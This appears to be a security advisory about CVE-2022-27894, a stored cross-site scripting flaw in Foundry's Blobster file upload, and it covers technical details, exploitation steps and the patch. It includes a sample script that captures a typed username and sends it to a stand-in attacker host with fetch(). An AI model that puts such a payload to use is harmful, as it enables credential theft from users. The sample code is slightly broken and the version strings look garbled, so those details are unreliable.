CVE-2022-27894: Patched Cross-Site Scripting Vulnerability in Foundry Blobster Service

A cross-site scripting (XSS) vulnerability was recently discovered in the Foundry Blobster service, potentially allowing malicious users to execute harmful scripts within the context of other Blobster users. This vulnerability, designated as CVE-2022-27894, has been resolved in version 3.228. of Blobster.

[Vulnerability]

The vulnerability was discovered in Foundry Blobster service, which provides image and file transformation services for web and mobile applications. Through this vulnerability, an attacker with access to Foundry could potentially target other users with malicious action, such as stealing user credentials or launching phishing attacks.

[Technical Details]

The CVE-2022-27894 vulnerability exists within the file upload functionality of the Blobster service. A flaw in the sanitization of user-supplied input allows attackers to insert malicious scripts into the stored files. When another user interacts with the affected file, the script is executed within the user's browser, leading to potential harm.

The following is an example of a malicious script that an attacker could use to exploit the vulnerability:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.">
    <title>Example of CVE-2022-27894 Exploit</title>
</head>
<body>
    <script>
        // Malicious code that captures user credentials
        document.getElementById('username').addEventListener('input', function(e) {
          const username = e.target.value;
          // Send the captured username to the attacker's server
          // Example only, replace with attacker's real server address
          fetch("https://attacker.example.com/log?username="; + encodeURIComponent(username));
        });
    </script>
</body>
</html>

[Exploit]

To exploit this vulnerability, an attacker would first need to gain access to the Foundry Blobster service. This could be achieved through brute force, social engineering, or other means. Once access is gained, the attacker could upload a malicious file containing the harmful script, as shown in the example above.

[Mitigation]

Foundry has released a security patch in version 3.228. of the Blobster service to address the CVE-2022-27894 vulnerability. Users are strongly advised to upgrade their Blobster installations to the latest version immediately. The patch corrects the input sanitization issue, preventing attackers from injecting harmful scripts into the file upload process.

[References]

Below are some resources that provide more information on CVE-2022-27894 and the security patch released by Foundry for Blobster 3.228.:

1. CVE-2022-27894 - NIST National Vulnerability Database (NVD)
2. Foundry Blobster - Official Documentation
3. Foundry Blobster 3.228. Release Notes

[Conclusion]
The discovery of CVE-2022-27894 in Foundry's Blobster service is a reminder of the potential risk that cross-site scripting vulnerabilities pose. It's essential for developers and administrators to stay up-to-date with security patches and follow best practices to avoid exposing their users and applications to such threats. For users who have not yet updated their Blobster installations to version 3.228., it's crucial to do so immediately to mitigate this vulnerability.

Timeline

Published on: 11/04/2022 18:15:00 UTC
Last modified on: 11/05/2022 00:33:00 UTC